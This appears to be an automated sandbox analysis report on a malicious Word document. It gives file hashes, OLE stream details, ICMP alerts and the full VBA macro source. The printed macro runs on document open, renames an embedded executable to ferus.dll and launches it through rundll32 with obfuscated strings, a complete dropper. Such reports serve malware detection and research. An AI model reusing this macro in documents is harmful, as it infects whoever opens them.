                                          SHA-256:881553C135F265B9AA3F3EB57798175973FEF557A7CD757987702F2CF8FB4C03
                                          SHA-512:0F63464A0D9441C0E702E5AFABCD7007C65C85ADAADC7FFC526D5F277EBBDF11DC91D2B21DBB150C0542DA0F4D16F326FADA99016B93C93818805F9EB62906B3
                                          Malicious:false
                                          Preview: [doc]..0427_5079687843613.LNK=0..0427_5079687843613.LNK=0..[doc]..0427_5079687843613.LNK=0..
                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                          MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                          SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                          SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                          SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                          Malicious:false
                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                          Category:dropped
                                          Size (bytes):2
                                          Entropy (8bit):1.0
                                          Encrypted:false
                                          SSDEEP:3:Qn:Qn
                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                          Malicious:false
                                          Preview: ..
                                          C:\Users\user\Desktop\~$27_5079687843613.doc
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                          MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                          SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                          SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                          SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                          Malicious:false

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: MyPc, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 27 13:05:00 2021, Last Saved Time/Date: Tue Apr 27 13:05:00 2021, Number of Pages: 1, Number of Words: 4, Number of Characters: 29, Security: 0
                                          Entropy (8bit):7.676875207184976
                                          TrID:
                                          • Microsoft Word document (32009/1) 54.23%
                                          • Microsoft Word document (old ver.) (19008/1) 32.20%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                          File name:0427_5079687843613.doc
                                          File size:776192
                                          MD5:9585b5f35b03d5339fb26585134c55c6
                                          SHA1:33871087ad9d69c46b1280f350d2e00105617701
                                          SHA256:632752c9d2297bd6b6467bd7b93f10c99716456f31e4bf314794f2ab6aeed0a8
                                          SHA512:d2586532eac8bee6831a7d69db10e8d3c343a6e5f554d855313bad4151e315d114167b0193b8b7eeb0fb9e7c17a07f8e4191aae05f83f7c0e4815d0de90ba66f
                                          SSDEEP:12288:4BGIkuNR9rhD5+OrYDpLNrh6kchemn+EJA55tnIR9DUVWksA:4EIjNvrhFNrYDpLdlmnPJA7VMlCW

                                          File Icon

                                          Icon Hash:e4eea2aaa4b4b4a4

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "0427_5079687843613.doc"

                                          Indicators

                                          Has Summary Info:True
                                          Application Name:Microsoft Office Word
                                          Encrypted Document:False
                                          Contains Word Document Stream:True
                                          Contains Workbook/Book Stream:False
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:
                                          Flash Objects Count:
                                          Contains VBA Macros:True

                                          Summary

                                          Code Page:1252
                                          Title:
                                          Subject:
                                          Author:MyPc
                                          Keywords:
                                          Comments:
                                          Template:Normal.dotm
                                          Last Saved By:MyPc
                                          Revision Number:2
                                          Total Edit Time:0
                                          Create Time:2021-04-27 12:05:00
                                          Last Saved Time:2021-04-27 12:05:00
                                          Number of Pages:1
                                          Number of Words:4
                                          Number of Characters:29
                                          Creating Application:Microsoft Office Word
                                          Security:0

                                          Document Summary

                                          Document Code Page:-535
                                          Number of Lines:1
                                          Number of Paragraphs:1
                                          Thumbnail Scaling Desired:False
                                          Company:
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:1048576

                                          Streams with VBA

                                          VBA File Name: Module1.bas, Stream Size: 4103
                                          General
                                          Stream Path:Macros/VBA/Module1
                                          VBA File Name:Module1.bas
                                          Stream Size:4103

                                          VBA Code Keywords

                                          Keyword
                                          Folders(N))
                                          String)
                                          Error
                                          VB_Name
                                          CreateObject(polo)
                                          f.SubFolders
                                          Folder
                                          "\ferus.d"
                                          Preserve
                                          kurlbik
                                          String
                                          Local
                                          RootPath
                                          Folders()
                                          strFileExists
                                          Dir(kurlbik
                                          ReDim
                                          Application.Run("hi",
                                          Getme(RootPath
                                          "\furmt.f"
                                          Dir(RootPath
                                          Folders(N)
                                          Attribute
                                          Resume
                                          fs.GetFolder(Folder)
                                          RootPath)
                                          Dir(nvbv
                                          "Scripting.FileSystemObject"
                                          Dir(Folders(N)
                                          VBA Code
                                          Attribute VB_Name = "Module1"
                                            
                                          Dim Folders() As String
                                          Dim pit As String
                                          Sub Getme(RootPath As String)
                                          Dim pafh As String
                                          pafh = pit
                                          hor = pafh
                                          Dim polo As String
                                          polo = "Scripting.FileSystemObject"
                                          Dim uuj As String
                                          uuj = "\furmt.f"
                                          strFileExists = Dir(RootPath & uuj)
                                                If strFileExists = "" Then
                                              
                                          Dim Folder As String
                                          Folder = RootPath
                                              Dim N%
                                              Dim fs, f, f1, fc
                                           
                                              Set fs = CreateObject(polo)
                                              Set f = fs.GetFolder(Folder)
                                              Set fc = f.SubFolders
                                           
                                              N = 0
                                              On Local Error Resume Next
                                              For Each f1 In fc
                                                N = N + 1
                                                ReDim Preserve Folders(1 To N) As String
                                                Folders(N) = Folder & "\" & f1.Name
                                                 If Dir(Folders(N) & "\" & uuj) = "" Then
                                                      Else
                                                          Dim kurlbik As String
                                              kurlbik = hor
                                                If Dir(kurlbik & "\ferus.d" & "l" & "l") = "" Then
                                                
                                                 kkl = Application.Run("hi", Folders(N))
                                          
                                                Else
                                                Exit Sub
                                            End If
                                                        End If
                                            
                                             Next f1
                                          
                                              Else
                                               Dim nvbv As String
                                              nvbv = hor
                                                If Dir(nvbv & "\ferus.d" & "l" & "l") = "" Then
                                                
                                                 kkl = Application.Run("hi", RootPath)
                                          
                                                Else
                                                Exit Sub
                                            End If
                                                  End If
                                          
                                          
                                          End Sub
                                          
                                          
                                          
                                          Sub q2(dl As String)
                                          pit = dl
                                          End Sub
                                          VBA File Name: Module2.bas, Stream Size: 3810
                                          General
                                          Stream Path:Macros/VBA/Module2
                                          VBA File Name:Module2.bas
                                          Stream Size:3810

                                          VBA Code Keywords

                                          Keyword
                                          String)
                                          VB_Name
                                          hi(myhome
                                          "\ferus.d"
                                          vbDirectory)
                                          Application.Run("nyd",
                                          Dir(Left(jos,
                                          String
                                          Left(klas,
                                          myhome,
                                          Selection.TypeBackspace
                                          Integer
                                          hhhhh()
                                          ntgs)
                                          "\Te"
                                          Application.Run("Getme",
                                          While
                                          Attribute
                                          VBA Code
                                          Attribute VB_Name = "Module2"
                                          Dim pit As String
                                          
                                          Sub hhhhh()
                                          Dim sda
                                          Dim posl As String
                                          Dim pafh As String
                                          Dim ntgs As Integer
                                          
                                          pafh = pit
                                          posl = pafh
                                          
                                          Dim bcs As String
                                          bcs = "al" & "\Te"
                                          
                                          
                                          Dim yer As String
                                          yer = "L" & "o" & "c" & bcs & "mp"
                                          
                                          
                                          
                                          
                                          Call cvbc
                                              ntgs = 50
                                          sda = 49
                                          Dim jos As String
                                          
                                          jos = posl
                                          
                                          While sda < 50
                                                ntgs = ntgs - 1
                                          
                                                If Dir(Left(jos, ntgs) & yer, vbDirectory) = "" Then
                                                  
                                              Else
                                            
                                             sda = 61
                                              End If
                                          
                                             Wend
                                             Dim klas As String
                                             klas = posl
                                             Dim bcsa As String
                                          bcsa = Application.Run("Getme", Left(klas, ntgs) & yer)
                                            Selection.TypeBackspace
                                             
                                          
                                          End Sub
                                          
                                          
                                          
                                          
                                          
                                          
                                          Sub hi(myhome As String)
                                          Dim plop As String
                                          Dim pafh As String
                                          pafh = pit
                                          plop = pafh
                                          Dim kkx As String
                                          kkx = Application.Run("nyd", myhome, plop & "\ferus.d" & "l" & "l")
                                          End Sub
                                          
                                          
                                          
                                          
                                          Sub q3(dl As String)
                                          pit = dl
                                          End Sub
                                          VBA File Name: Module3.bas, Stream Size: 4198
                                          General
                                          Stream Path:Macros/VBA/Module3
                                          VBA File Name:Module3.bas
                                          Stream Size:4198

                                          VBA Code Keywords

                                          Keyword
                                          String,
                                          String)
                                          Unit:=wdCharacter,
                                          Dir(sf
                                          VB_Name
                                          Application.Run("nm",
                                          ololow
                                          nyd(uuu
                                          ololow)
                                          rnee(uuu,
                                          String
                                          nothings
                                          Unit:=wdLine,
                                          "\furmt.f")
                                          Dir(nothings)
                                          Selection.Copy
                                          Selection.TypeBackspace
                                          cvbc()
                                          rnee(myhome
                                          lassap
                                          "\furmt.f"
                                          Selection.MoveRight
                                          aaaa)
                                          bcvxzc()
                                          myhome
                                          Attribute
                                          checkthe(sf
                                          bcvxzc
                                          Selection.MoveDown
                                          VBA Code
                                          Attribute VB_Name = "Module3"
                                          
                                          Dim pit As String
                                          
                                          
                                          
                                          
                                          
                                          
                                          
                                          
                                          
                                          
                                          
                                          
                                          Sub checkthe(sf As String)
                                          
                                          Dim pafh As String
                                          pafh = pit
                                          Dim lassap As String
                                          
                                            
                                          Dim ololow As String
                                          ololow = sf
                                          Dim nothings As String
                                          nothings = 2
                                          
                                              If Dir(sf & "\furmt.f") = "" Then
                                              
                                              Else
                                                   If Dir(nothings) = "" Then
                                          
                                                lassap = Application.Run("nm", ololow)
                                              Else
                                             Exit Sub
                                              End If
                                            
                                              End If
                                          End Sub
                                          
                                          
                                          
                                          Sub nyd(uuu As String, aaaa As String)
                                          
                                          Call rnee(uuu, aaaa)
                                          End Sub
                                          
                                          
                                          
                                          Sub rnee(myhome As String, hsa As String)
                                          
                                          Name myhome & "\furmt.f" As hsa
                                          End Sub
                                          
                                          
                                          
                                          Sub bcvxzc()
                                              Selection.MoveRight Unit:=wdCharacter, Count:=5
                                              Selection.MoveDown Unit:=wdLine, Count:=23
                                              Selection.MoveRight Unit:=wdCharacter, Count:=51
                                                 Selection.TypeBackspace
                                             Selection.Copy
                                          
                                          End Sub
                                          
                                          
                                          
                                          
                                          Sub cvbc()
                                          Selection.MoveDown Unit:=wdLine, Count:=1
                                              Selection.MoveRight Unit:=wdCharacter, Count:=5
                                              Selection.MoveDown Unit:=wdLine, Count:=23
                                              Selection.MoveRight Unit:=wdCharacter, Count:=51
                                           Selection.MoveDown Unit:=wdLine, Count:=23
                                          Call bcvxzc
                                          End Sub
                                          
                                          
                                          
                                          Sub q4(dl As String)
                                          pit = dl
                                          End Sub
                                          VBA File Name: Module4.bas, Stream Size: 1697
                                          General
                                          Stream Path:Macros/VBA/Module4
                                          VBA File Name:Module4.bas
                                          Stream Size:1697

                                          VBA Code Keywords

                                          Keyword
                                          String
                                          "\furmt.f"
                                          String)
                                          Attribute
                                          VB_Name
                                          "ferus.d"
                                          ololow
                                          nm(ololow
                                          VBA Code
                                          Attribute VB_Name = "Module4"
                                          Dim pit As String
                                          
                                          
                                          Sub q5(dl As String)
                                          pit = dl
                                          End Sub
                                          
                                          Sub nm(ololow As String)
                                            Name ololow & "\furmt.f" As pit & "\" & "ferus.d" & "l" & "l"
                                          End Sub
                                          VBA File Name: Module5.bas, Stream Size: 705
                                          General
                                          Stream Path:Macros/VBA/Module5
                                          VBA File Name:Module5.bas
                                          Stream Size:705

                                          VBA Code Keywords

                                          Keyword
                                          Attribute
                                          VB_Name
                                          VBA Code
                                          Attribute VB_Name = "Module5"
                                          VBA File Name: Module6.bas, Stream Size: 705
                                          General
                                          Stream Path:Macros/VBA/Module6
                                          VBA File Name:Module6.bas
                                          Stream Size:705

                                          VBA Code Keywords

                                          Keyword
                                          Attribute
                                          VB_Name
                                          VBA Code
                                          Attribute VB_Name = "Module6"
                                          VBA File Name: ThisDocument.cls, Stream Size: 8548
                                          General
                                          Stream Path:Macros/VBA/ThisDocument
                                          VBA File Name:ThisDocument.cls
                                          Stream Size:8548

                                          VBA Code Keywords

                                          Keyword
                                          ksa()
                                          jkjhb
                                          ",YYUNXEGQRYS"
                                          Object
                                          iep()
                                          bfdsdadad
                                          werfsxv
                                          xcvxv
                                          Document_Open()
                                          luyhgdffs
                                          jkjhbf
                                          False
                                          xcvxv.Run
                                          String)
                                          stetptwwo
                                          String
                                          htyhbv
                                          VB_GlobalNameSpace
                                          vvvvvvvx
                                          hgvmbm
                                          "ThisDocument"
                                          VB_Base
                                          bcvsdsf
                                          chek()
                                          Dir(jos
                                          VB_Creatable
                                          VB_Exposed
                                          Options.DefaultFilePath(wdAutoRecoverPath)
                                          Left(askl,
                                          "\ferus.d"
                                          vvvvvvvx()
                                          nmbvd
                                          Integer
                                          hhhhh
                                          oloow
                                          hgfcvxv
                                          kjhnbs
                                          Attribute
                                          VB_PredeclaredId
                                          VB_Name
                                          VBA.CreateObject("WScript.Shell")
                                          stetptwwo()
                                          VB_Customizable
                                          xzczxc
                                          bcvxz
                                          VB_TemplateDerived
                                          xzczxc()
                                          wrefs
                                          Private
                                          erfvbcz
                                          VBA Code
                                          Attribute VB_Name = "ThisDocument"
                                          Attribute VB_Base = "1Normal.ThisDocument"
                                          Attribute VB_GlobalNameSpace = False
                                          Attribute VB_Creatable = False
                                          Attribute VB_PredeclaredId = True
                                          Attribute VB_Exposed = True
                                          Attribute VB_TemplateDerived = True
                                          Attribute VB_Customizable = True
                                          
                                          Dim ji As Integer
                                          Dim pit As String
                                          Dim r1, r2 As String
                                          Dim w1, w2 As String
                                          Private Sub Document_Open()
                                          Call stetptwwo
                                          End Sub
                                          
                                          
                                          
                                          Sub stetptwwo()
                                          ji = 0
                                          Call iep
                                          Dim rx As String
                                           Dim oys As String
                                          
                                           Dim bcvxz As String
                                          rx = "\ferus.d"
                                          Dim mbnd As Integer
                                          Dim kjhnbs As Integer
                                          Call chek
                                          kjhnbs = ji
                                          
                                          Dim jkjhb As String
                                          If kjhnbs = 1 Then
                                          Else
                                          Dim jkjhbf As String
                                          
                                          
                                          Call hhhhh
                                          Dim wrefs As String
                                          wrefs = pit
                                           bcvxz = wrefs
                                          Dim bfdsdadad As String
                                          Dim erfvbcz As String
                                          
                                          bfdsdadad = "n"
                                          
                                          Call ks
                                          Call ksa
                                          
                                          Dim bcbv As String
                                          bcbv = nmbvd
                                          Dim hgfcvxv As String
                                          
                                          Dim oloow As String
                                          oloow = r2
                                          werfsxv = "3" & 2 & oloow
                                          Dim hfgv As String
                                          hfgv = bfdsdadad & "d"
                                          
                                          
                                           Dim htyhbv As String
                                           htyhbv = werfsxv
                                           Dim hgvmbm As String
                                           hgvmbm = "r"
                                           
                                          Dim luyhgdffs As String
                                          luyhgdffs = "l"
                                           Dim bcvsdsf As String
                                           bcvsdsf = hgvmbm & "u" & hfgv & "l" & luyhgdffs & htyhbv
                                          
                                          
                                          hgfcvxv = r1
                                          oys = bcvxz & rx & hgfcvxv & hgfcvxv & ",YYUNXEGQRYS"
                                          
                                           
                                               Dim xcvxv As Object
                                          Set xcvxv = VBA.CreateObject("WScript.Shell")
                                          
                                          xcvxv.Run bcvsdsf & " " & oys
                                          
                                          End If
                                          End Sub
                                          
                                          
                                          
                                          
                                          
                                          
                                          Sub chek()
                                          
                                          Dim jos As String
                                          Dim pafh As String
                                          pafh = pit
                                          jos = pafh
                                          
                                           
                                           If Dir(jos & "\ferus.d" & "l" & "l") = "" Then
                                           ji = 0
                                           Else
                                          
                                           ji = 1
                                           End If
                                          End Sub
                                          
                                          
                                          
                                          Sub xzczxc()
                                          w1 = ThisDocument.Tables(1).Cell(1, 1).Range.Text
                                          End Sub
                                          
                                          
                                          
                                          
                                          Sub vvvvvvvx()
                                          w2 = ThisDocument.Tables(1).Cell(1, 2).Range.Text
                                          End Sub
                                          
                                          
                                          
                                          Sub ks()
                                          Dim askl As String
                                          Call xzczxc
                                          askl = w1
                                          r1 = Left(askl, 3)
                                          
                                          r1 = Right(r1, 1)
                                          
                                          End Sub
                                          
                                          Sub ksa()
                                          Dim askl As String
                                          Call vvvvvvvx
                                          askl = w2
                                          r2 = Left(askl, 4)
                                          End Sub
                                          Sub q1(dl As String)
                                          pit = dl
                                          End Sub
                                          Sub iep()
                                          Dim kf As String
                                          kf = Options.DefaultFilePath(wdAutoRecoverPath)
                                          Call q1(kf)
                                          Call q2(kf)
                                          Call q3(kf)
                                          Call q4(kf)
                                          Call q5(kf)
                                          End Sub

                                          Streams

                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                          General
                                          Stream Path:\x1CompObj
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.2359563651
                                          Base64 Encoded:True
                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 320
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          File Type:data
                                          Stream Size:320
                                          Entropy:2.63012313926
                                          Base64 Encoded:False
                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 412
                                          General
                                          Stream Path:\x5SummaryInformation
                                          File Type:data
                                          Stream Size:412
                                          Entropy:3.10336634213
                                          Base64 Encoded:False
                                          Stream Path: 1Table, File Type: ARC archive data, crunched, Stream Size: 17642
                                          General
                                          Stream Path:1Table
                                          File Type:ARC archive data, crunched
                                          Stream Size:17642
                                          Entropy:6.30461054818
                                          Base64 Encoded:True
                                          Stream Path: Data, File Type: data, Stream Size: 566304
                                          General
                                          Stream Path:Data
                                          File Type:data
                                          Stream Size:566304
                                          Entropy:7.97255502805
                                          Base64 Encoded:True
                                          Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 646
                                          General
                                          Stream Path:Macros/PROJECT
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:646
                                          Entropy:5.28301411564
                                          Base64 Encoded:True
                                          Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 185
                                          General
                                          Stream Path:Macros/PROJECTwm
                                          File Type:data
                                          Stream Size:185
                                          Entropy:3.1988943233
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4858
                                          General
                                          Stream Path:Macros/VBA/_VBA_PROJECT
                                          File Type:data
                                          Stream Size:4858
                                          Entropy:4.95266102607
                                          Base64 Encoded:True
                                          Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 3855
                                          General
                                          Stream Path:Macros/VBA/__SRP_0
                                          File Type:data
                                          Stream Size:3855
                                          Entropy:3.21442122564
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 400
                                          General
                                          Stream Path:Macros/VBA/__SRP_1
                                          File Type:data
                                          Stream Size:400
                                          Entropy:2.22848150291
                                          Base64 Encoded:True
                                          Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 3439
                                          General
                                          Stream Path:Macros/VBA/__SRP_2
                                          File Type:data
                                          Stream Size:3439
                                          Entropy:3.10193751309
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 582
                                          General
                                          Stream Path:Macros/VBA/__SRP_3
                                          File Type:data
                                          Stream Size:582
                                          Entropy:2.26624465158
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/__SRP_4, File Type: data, Stream Size: 545
                                          General
                                          Stream Path:Macros/VBA/__SRP_4
                                          File Type:data
                                          Stream Size:545
                                          Entropy:1.53014437211
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/__SRP_5, File Type: data, Stream Size: 286
                                          General
                                          Stream Path:Macros/VBA/__SRP_5
                                          File Type:data
                                          Stream Size:286
                                          Entropy:1.87496371333
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/__SRP_6, File Type: data, Stream Size: 414
                                          General
                                          Stream Path:Macros/VBA/__SRP_6
                                          File Type:data
                                          Stream Size:414
                                          Entropy:1.54678999411
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/__SRP_7, File Type: data, Stream Size: 238
                                          General
                                          Stream Path:Macros/VBA/__SRP_7
                                          File Type:data
                                          Stream Size:238
                                          Entropy:1.85430320561
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/__SRP_8, File Type: data, Stream Size: 918
                                          General
                                          Stream Path:Macros/VBA/__SRP_8
                                          File Type:data
                                          Stream Size:918
                                          Entropy:1.49183498038
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/__SRP_9, File Type: data, Stream Size: 492
                                          General
                                          Stream Path:Macros/VBA/__SRP_9
                                          File Type:data
                                          Stream Size:492
                                          Entropy:2.05140820265
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/__SRP_a, File Type: data, Stream Size: 414
                                          General
                                          Stream Path:Macros/VBA/__SRP_a
                                          File Type:data
                                          Stream Size:414
                                          Entropy:1.54085065935
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/__SRP_b, File Type: data, Stream Size: 236
                                          General
                                          Stream Path:Macros/VBA/__SRP_b
                                          File Type:data
                                          Stream Size:236
                                          Entropy:1.85784660876
                                          Base64 Encoded:False
                                          Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 783
                                          General
                                          Stream Path:Macros/VBA/dir
                                          File Type:data
                                          Stream Size:783
                                          Entropy:6.52623966589
                                          Base64 Encoded:True
                                          Stream Path: ObjectPool/_1681005150/\x1CompObj, File Type: data, Stream Size: 76
                                          General
                                          Stream Path:ObjectPool/_1681005150/\x1CompObj
                                          File Type:data
                                          Stream Size:76
                                          Entropy:3.09344952647
                                          Base64 Encoded:False
                                          Data ASCII (printable strings): OLE Package, Package
                                          Stream Path: ObjectPool/_1681005150/\x1Ole10Native, File Type: data, Stream Size: 123180
                                          General
                                          Stream Path:ObjectPool/_1681005150/\x1Ole10Native
                                          File Type:data
                                          Stream Size:123180
                                          Entropy:6.81910907593
                                          Base64 Encoded:True
                                          Data ASCII (printable strings): furmt.f, C:\Users\MyPc\Desktop\Builder_v667\furmt.f, C:\Users\MyPc\AppData\Local\Temp\furmt.f, MZP, This program must be run under Win32
                                          Stream Path: ObjectPool/_1681005150/\x3EPRINT, File Type: Windows Enhanced Metafile (EMF) image data version 0x10000, Stream Size: 4976
                                          General
                                          Stream Path:ObjectPool/_1681005150/\x3EPRINT
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Stream Size:4976
                                          Entropy:3.35834517606
                                          Base64 Encoded:False
                                          Stream Path: ObjectPool/_1681005150/\x3ObjInfo, File Type: data, Stream Size: 6
                                          General
                                          Stream Path:ObjectPool/_1681005150/\x3ObjInfo
                                          File Type:data
                                          Stream Size:6
                                          Entropy:1.25162916739
                                          Base64 Encoded:False
                                          Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                          General
                                          Stream Path:WordDocument
                                          File Type:data
                                          Stream Size:4096
                                          Entropy:1.81283499392
                                          Base64 Encoded:False

                                          Network Behavior

                                          Snort IDS Alerts

                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                          04/29/21-08:16:14.954530 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:21.040252 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:22.054484 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:24.066175 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:28.406814 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:29.420586 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:31.433770 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:36.708850 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:37.734041 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:39.746092 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:42.494949 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:44.488661 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:45.523610 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:51.344206 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:52.352483 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:16:54.364049 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:00.207171 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:02.152940 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:04.165054 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:08.109281 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:09.123135 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:11.160237 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:15.460561 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:16.474311 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:18.487123 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:23.323301 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:24.339192 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:26.349890 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:29.713418 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:31.703850 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:32.832442 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:38.563358 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:39.577040 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:41.589862 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:44.952120 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:46.943725 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:48.959819 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                                          04/29/21-08:17:53.806066 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
